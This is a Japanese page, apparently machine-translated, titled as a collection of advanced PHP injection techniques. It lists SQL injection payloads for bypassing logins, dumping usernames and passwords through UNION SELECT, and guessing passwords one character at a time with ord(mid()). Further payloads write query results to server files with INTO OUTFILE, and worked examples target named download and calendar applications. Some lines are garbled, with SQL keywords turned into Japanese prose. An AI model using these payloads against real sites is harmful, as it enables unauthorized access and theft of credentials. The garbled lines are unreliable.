高度な PHP インジェクション手法集 ページ 1/2

'#

' および passWord='mypass

id=-1 Union select 1,1,1

id=-1 Union select char(97),char( 97),char(97)

id=1 ユニオンはメンバーから 1,1,1 を選択します

id=1 ユニオンは管理者から 1,1,1 を選択します

id =1 ユーザー

userid=1 およびパスワード=mypass

userid=1 およびmid(password,3,1)=char(112)
から 1,1,1 を選択する結合
userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 (ord 関数は非常に使いやすいです) Shaped)

' および LENGTH(password)='6 (パスワード長の検出)

' および LEFT(password,1)='m

' およびLEFT(password,2)='my

……………………など

' Union select 1,username,password from user/*

' Union select 1,username,password from user/*

=' Union select 1,username,password from user/* (1 または直接 = を続けることができます)

99999' Union select 1,username,password from user/*

' を出力ファイル 'c:/file.txt (エクスポート ファイル)

=' に入力するか、1=1 を出力ファイル 'c:/file に入力します。 txt

1' Union select 1,username,password from user into outfile 'c:/user.txt

管理者からパスワードを選択 wherelogin='John' INTO DUMPFILE '/path/to / site/file.txt'

id=' Union select 1,username,password from user into outfile

id=-1 Union select 1,database(),version() (柔軟アプリケーション クエリ)

一般的なクエリ テスト ステートメント、

select * FROM table where 1=1

select * FROM table where 'uuu'='uuu'

select * FROM table where 12

select * FROM table where 3>2

select * FROM table where 2
select * FROM table where 1

select * FROM table where 1 1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where 'b' BETWEEN 'a' AND 'c'

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

例: Night Cat ダウンロード システム バージョン 1.0

id=1 Union select 1,1,1 ,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

共用体選択 1,1,1,1,1, 1, 1,1,1,1,1,1,1,1,1,1,1,1,1 ymdown_user から

union select 1,1,1,1,1,1,1 ,1 ,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 Union select 1,1,1,1,1 ,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username, 1、ymdown_user のパスワード、1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 (id=1 の場合) (パスワードの置換、検索)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid (パスワード ,1,1))=49 (最初のパスワードを確認します)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1, 1 ,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (2 位)

union select 1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 (id=1 および ord(mid(password,3,1))=51 の ymdown_user から)

…………………………………………………………

例 2: グレーのトラック テスト用の変換 ID (meteor)

union (select allowedmilies,public,userid,'0000-0-0',user(),version() FROM Calendar_eventsイベントID = 13) イベント日付順に並べ替えます

union (allowsmilies,public,userid,'0000-0-0',pass(),version() FROM Calendar_events を選択します ここで、イベントID = 10) イベント日付順に並べ替えます